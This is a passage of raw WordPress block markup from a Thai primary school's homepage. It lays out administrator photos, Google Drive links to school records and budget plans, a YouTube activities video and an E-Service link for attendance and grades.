title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" 